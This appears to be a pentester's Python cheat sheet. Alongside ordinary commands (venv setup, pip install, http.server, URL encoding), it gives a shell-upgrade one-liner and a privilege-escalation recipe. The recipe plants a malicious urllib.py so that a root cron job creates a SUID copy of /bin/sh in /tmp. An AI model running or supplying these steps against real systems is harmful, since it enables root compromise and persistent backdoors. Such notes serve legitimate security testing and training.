% python

# create virtual environment venv
python3 -m venv env
. ./env/bin/activate

# install dependencies from file
pip install -r requirements.txt

# upgrade shell
python -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'

# http.server
python3 -m http.server

# url encode
python3 -c "import urllib.parse; print(urllib.parse.quote('<STRING>'))"

# url decode
python3 -c "import urllib.parse; print(urllib.parse.unquote('<ENCODED_STRING>'))"

# PRIVESC import highjacking
eg: python script run by CRON in context of root
eg: python script imports urllib
echo 'import os;os.system("cp /bin/sh /tmp/sh;chmod u+s /tmp/sh")' > urllib.py
wait for CRON job to trigger
/tmp/sh -p

# custom user-agent
session = requests.Session()
session.headers.update({'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0'})
